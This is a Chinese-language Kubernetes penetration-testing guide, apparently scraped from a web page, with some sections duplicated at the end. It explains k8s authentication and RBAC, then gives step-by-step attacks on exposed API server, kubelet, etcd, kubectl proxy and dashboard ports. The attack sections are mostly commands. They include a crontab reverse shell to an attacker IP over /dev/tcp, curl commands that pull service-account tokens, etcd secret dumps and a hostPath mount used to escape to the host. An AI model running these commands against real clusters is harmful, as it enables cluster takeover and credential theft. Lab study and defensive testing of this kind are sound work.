Kubernetes云原生环境渗透学习指南<\/h1>

前言<\/h2>
Kubernetes（简称k8s）是当前主流的容器调度平台，被称为云原生时代的操作系统。随着云原生技术的普及，学习在k8s环境下的攻击手法变得尤为重要。<\/p>

Kubernetes用户类型<\/h2>

Kubernetes集群中包含两类用户：<\/p>

Service Account<\/strong>：由Kubernetes API管理的账户，绑定到特定的namespace，由API server自动或手动创建，凭证存储在Secret中并挂载到pod中。<\/p> <\/li>

User Account<\/strong>：由Kubernetes之外的服务管理的用户账号，如管理员分发的密钥、Keystone用户存储等，Kubernetes中不存在表示此类用户账号的对象。<\/p> <\/li> <\/ol>
Kubernetes访问控制过程<\/h2>
所有API请求都通过apiserver组件实现，主要功能包括：<\/p>

认证(Authentication)<\/strong>：检查用户是否为合法用户，支持方式：<\/p>

客户端证书<\/li>
密码<\/li>
bootstrap tokens<\/li>
JWT tokens<\/li> <\/ul> <\/li>

鉴权(Authorization)<\/strong>：判断用户是否具有操作权限，主流机制：<\/p>

Node<\/li>
RBAC（Role-Based Access Control）<\/li>
ABAC<\/li>
webhook<\/li> <\/ul> <\/li>

准入控制(Admission Control)<\/strong>：请求的最后步骤，用于拓展功能如检查pod资源配置、安全合规等。<\/p> <\/li> <\/ol>
Kubernetes认证方式<\/h2>
X509 Client Certs<\/h3>
Kubernetes默认开启且使用最多的认证方式，API server启动时指定CA证书及私钥，通过同一CA签发的客户端x509证书视为可信。<\/p>
Service Account Tokens<\/h3>
Service account使用的认证方式，包含三个内容：<\/p>

namespace：指定pod所在的namespace<\/li>
token：用于身份验证<\/li>
ca：用于验证apiserver的证书<\/li> <\/ul>
Kubernetes鉴权机制<\/h2>
Kubernetes支持四种授权机制：<\/p>

Node<\/li>
ABAC<\/li>
RBAC（默认启用）<\/li>
Webhook<\/li> <\/ol>
实验环境搭建<\/h2>
建议使用3台CentOS 7节点：<\/p>

K8s-master: 192.168.11.152<\/li>
K8s-node1: 192.168.11.153<\/li>
K8s-node2: 192.168.11.160<\/li>
攻击机Kali: 192.168.11.128<\/li> <\/ul>
信息收集<\/h2>
在K8s集群内部网络探测时需重点关注以下端口：<\/p>

kube-apiserver: 6443, 8080<\/li>
kubectl proxy: 8080, 8081<\/li>
kubelet: 10250, 10255, 4149<\/li>
dashboard: 30000<\/li>
docker api: 2375<\/li>
etcd: 2379, 2380<\/li>
kube-controller-manager: 10252<\/li>
kube-proxy: 10256, 31442<\/li>
kube-scheduler: 10251<\/li>
weave: 6781, 6782, 6783<\/li>
kubeflow-dashboard: 8080<\/li> <\/ul>
攻击手法<\/h2>
基本思路<\/h3>
寻找高权限凭据或组件配置不当导致的未授权访问，主要方式：<\/p>

获取kubeconfig（证书）<\/li>
获取service-account-tokens<\/li> <\/ol>
攻击8080端口<\/h3>
原理<\/strong>：旧版本K8s的API Server默认开启8080端口（无需认证）和6443端口（TLS加密）。新版本默认不开启8080端口。<\/p>
利用<\/strong>：<\/p>

修改\/etc\/kubernetes\/manifests\/api-kube.conf<\/code>，添加： --insecure-port=8080 --insecure-bind-address=0.0.0.0 <\/code><\/pre> <\/li> 重启服务： systemctl daemon-reload <\/span><\/span>systemctl restart kubelet <\/span><\/span><\/code><\/pre><\/li> 使用kubectl获取集群信息： kubectl -s ip:port get nodes <\/span><\/span><\/code><\/pre><\/li> 创建特权容器并挂载主机路径： apiVersion<\/span>: v1<\/span> <\/span><\/span>kind<\/span>: Pod<\/span> <\/span><\/span>metadata<\/span>: <\/span><\/span> name<\/span>: test<\/span> <\/span><\/span>spec<\/span>: <\/span><\/span> containers<\/span>: <\/span><\/span> - image<\/span>: nginx<\/span> <\/span><\/span> name<\/span>: test-container<\/span> <\/span><\/span> volumeMounts<\/span>: <\/span><\/span> - mountPath<\/span>: \/mnt<\/span> <\/span><\/span> name<\/span>: test-volume<\/span> <\/span><\/span> volumes<\/span>: <\/span><\/span> - name<\/span>: test-volume<\/span> <\/span><\/span> hostPath<\/span>: <\/span><\/span> path<\/span>: \/<\/span> <\/span><\/span><\/code><\/pre><\/li> 执行命令写入反弹shell： echo -e "* * * * * root bash -i >& \/dev\/tcp\/192.168.11.128\/4444 0>&1\n"<\/span> >> \/mnt\/etc\/crontab <\/span><\/span><\/code><\/pre><\/li> <\/ol> 攻击6443端口<\/h3> 原理<\/strong>：当集群配置不当，将"system:anonymous"用户绑定到"cluster-admin"用户组时，6443端口允许匿名用户以管理员权限操作。<\/p> 利用<\/strong>：<\/p> 创建ClusterRoleBinding： kubectl create clusterrolebinding system:anonymous --clusterrole=<\/span>cluster-admin --user=<\/span>system:anonymous <\/span><\/span><\/code><\/pre><\/li> 使用匿名账号登录： .\/cdk kcurl anonymous get "https:\/\/192.168.11.152:6443\/api\/v1\/nodes"<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 攻击10250端口<\/h3> 原理<\/strong>：Kubelet API监听10250（读写）和10255（只读）端口。默认配置下10250端口需要认证。<\/p> 利用<\/strong>：<\/p> 修改\/var\/lib\/kubelet\/config.yaml<\/code>： authentication<\/span>: <\/span><\/span> anonymous<\/span>: <\/span><\/span> enabled<\/span>: true<\/span> <\/span><\/span>authorization<\/span>: <\/span><\/span> mode<\/span>: AlwaysAllow<\/span> <\/span><\/span><\/code><\/pre><\/li> 重启kubelet： systemctl restart kubelet <\/span><\/span><\/code><\/pre><\/li> 检索特权容器获取Token： curl -k -XPOST "https:\/\/192.168.11.160:10250\/run\/kube-system\/kube-flannel-ds-dsltf\/kube-flannel"<\/span> -d "cmd=cat \/var\/run\/secrets\/kubernetes.io\/serviceaccount\/token"<\/span> <\/span><\/span><\/code><\/pre><\/li> 使用Token访问API-Server： kubectl --insecure-skip-tls-verify=<\/span>true --server=<\/span>"https:\/\/192.168.11.152:6443"<\/span> --token=<\/span>"eyJhb....."<\/span> get pods <\/span><\/span><\/code><\/pre><\/li> <\/ol> 攻击2379端口<\/h3> 原理<\/strong>：etcd组件默认监听2379端口，存放节点信息如token和证书。配置不当可能导致未授权访问。<\/p> 利用<\/strong>：<\/p> 使用etcdctl访问： export ETCDCTL_API=<\/span>3<\/span> <\/span><\/span>etcdctl --endpoints=<\/span>https:\/\/172.16.0.112:2379 get \/ --prefix --keys-only <\/span><\/span><\/code><\/pre><\/li> 带证书访问： etcdctl --insecure-skip-tls-verify --insecure-transport=<\/span>true --endpoints=<\/span>https:\/\/172.16.0.112:2379 --cacert=<\/span>ca.pem --key=<\/span>etcd-client-key.pem --cert=<\/span>etcd-client.pem endpoint health <\/span><\/span><\/code><\/pre><\/li> 查找并读取service account token： etcdctl get \/ --prefix --keys-only | grep \/secrets\/ <\/span><\/span>etcdctl get \/registry\/secrets\/kube-system\/clusterrole-aggregation-controller-token-jdp5z <\/span><\/span><\/code><\/pre><\/li> <\/ol> Kubectl Proxy攻击<\/h3> 原理<\/strong>：使用kubectl proxy<\/code>命令使API server监听在本地端口。<\/p> 利用<\/strong>：<\/p> 设置API server接收所有主机请求： kubectl --insecure-skip-tls-verify proxy --accept-hosts=<\/span>^.*$ --address=<\/span>0.0.0.0 --port=<\/span>8009<\/span> <\/span><\/span><\/code><\/pre><\/li> 通过特定端口访问集群： kubectl -s http:\/\/192.168.11.152:8009 get pods -n kube-system <\/span><\/span><\/code><\/pre><\/li> <\/ol> Dashboard攻击<\/h3> 原理<\/strong>：Dashboard配置不当可能导致未授权访问。<\/p> 利用<\/strong>：<\/p> 添加参数启用跳过登录： --enable-skip-login <\/code><\/pre> <\/li> 为Kubernetes-dashboard绑定cluster-admin： apiVersion<\/span>: rbac.authorization.k8s.io\/v1<\/span> <\/span><\/span>kind<\/span>: ClusterRoleBinding<\/span> <\/span><\/span>metadata<\/span>: <\/span><\/span> name<\/span>: dashboard-1<\/span> <\/span><\/span>subjects<\/span>: <\/span><\/span>- kind<\/span>: ServiceAccount<\/span> <\/span><\/span> name<\/span>: k8s-dashboard-kubernetes-dashboard<\/span> <\/span><\/span> namespace<\/span>: kube-system<\/span> <\/span><\/span>roleRef<\/span>: <\/span><\/span> kind<\/span>: ClusterRole<\/span> <\/span><\/span> name<\/span>: cluster-admin<\/span> <\/span><\/span> apiGroup<\/span>: rbac.authorization.k8s.io<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 横向移动技术<\/h2> 亲和性与反亲和性<\/h3> 节点亲和性(nodeAffinity)<\/strong>：控制Pod部署在哪些节点上<\/p> 查看节点label： kubectl get nodes --show-labels <\/span><\/span><\/code><\/pre><\/li> 给节点打label： kubectl label nodes k8s-node01 com=<\/span>justtest <\/span><\/span><\/code><\/pre><\/li> 使用nodeSelector调度Pod： spec<\/span>: <\/span><\/span> nodeSelector<\/span>: <\/span><\/span> com<\/span>: justtest<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> Pod亲和性(podAffinity)<\/strong>：处理Pod与Pod之间的关系<\/p> <\/li> <\/ol> 污点与容忍度<\/h3> 标记节点污点： kubectl taint nodes k8s-node01 test=<\/span>k8s-node01:NoSchedule <\/span><\/span><\/code><\/pre><\/li> 添加容忍声明： tolerations<\/span>: <\/span><\/span>- key<\/span>: "test"<\/span> <\/span><\/span> operator<\/span>: "Equal"<\/span> <\/span><\/span> value<\/span>: "k8s-node01"<\/span> <\/span><\/span> effect<\/span>: "NoSchedule"<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> Master节点逃逸<\/h3> 查看Master节点容忍度<\/li> 创建带有容忍参数并挂载宿主机根目录的Pod： apiVersion<\/span>: v1<\/span> <\/span><\/span>kind<\/span>: Pod<\/span> <\/span><\/span>metadata<\/span>: <\/span><\/span> name<\/span>: myapp2<\/span> <\/span><\/span>spec<\/span>: <\/span><\/span> containers<\/span>: <\/span><\/span> - image<\/span>: nginx<\/span> <\/span><\/span> name<\/span>: test-container<\/span> <\/span><\/span> volumeMounts<\/span>: <\/span><\/span> - mountPath<\/span>: \/mnt<\/span> <\/span><\/span> name<\/span>: test-volume<\/span> <\/span><\/span> tolerations<\/span>: <\/span><\/span> - key<\/span>: node-role.kubernetes.io\/master<\/span> <\/span><\/span> operator<\/span>: Exists<\/span> <\/span><\/span> effect<\/span>: NoSchedule<\/span> <\/span><\/span> volumes<\/span>: <\/span><\/span> - name<\/span>: test-volume<\/span> <\/span><\/span> hostPath<\/span>: <\/span><\/span> path<\/span>: \/<\/span> <\/span><\/span><\/code><\/pre><\/li> 通过挂载目录逃逸到宿主机<\/li> <\/ol> 参考资源<\/h2> Kubernetes官方文档<\/li> Kubernetes安全测试实践录<\/li> k8s安全攻防系列文章<\/li> 云上攻防研究文章<\/li> 红蓝对抗中的云原生漏洞挖掘实录<\/li> <\/ol>

Kubernetes云原生环境渗透学习指南<\/h1>

前言<\/h2> Kubernetes（简称k8s）是当前主流的容器调度平台，被称为云原生时代的操作系统。随着云原生技术的普及，学习在k8s环境下的攻击手法变得尤为重要。<\/p>

X509 Client Certs<\/h3> Kubernetes默认开启且使用最多的认证方式，API server启动时指定CA证书及私钥，通过同一CA签发的客户端x509证书视为可信。<\/p>

攻击手法<\/h2>

横向移动技术<\/h2>

参考资源<\/h2> Kubernetes官方文档<\/li> Kubernetes安全测试实践录<\/li> k8s安全攻防系列文章<\/li> 云上攻防研究文章<\/li> 红蓝对抗中的云原生漏洞挖掘实录<\/li> <\/ol>

前言<\/h2>
Kubernetes（简称k8s）是当前主流的容器调度平台，被称为云原生时代的操作系统。随着云原生技术的普及，学习在k8s环境下的攻击手法变得尤为重要。<\/p>

X509 Client Certs<\/h3>
Kubernetes默认开启且使用最多的认证方式，API server启动时指定CA证书及私钥，通过同一CA签发的客户端x509证书视为可信。<\/p>

参考资源<\/h2>

Kubernetes官方文档<\/li>
Kubernetes安全测试实践录<\/li>
k8s安全攻防系列文章<\/li>
云上攻防研究文章<\/li>
红蓝对抗中的云原生漏洞挖掘实录<\/li> <\/ol>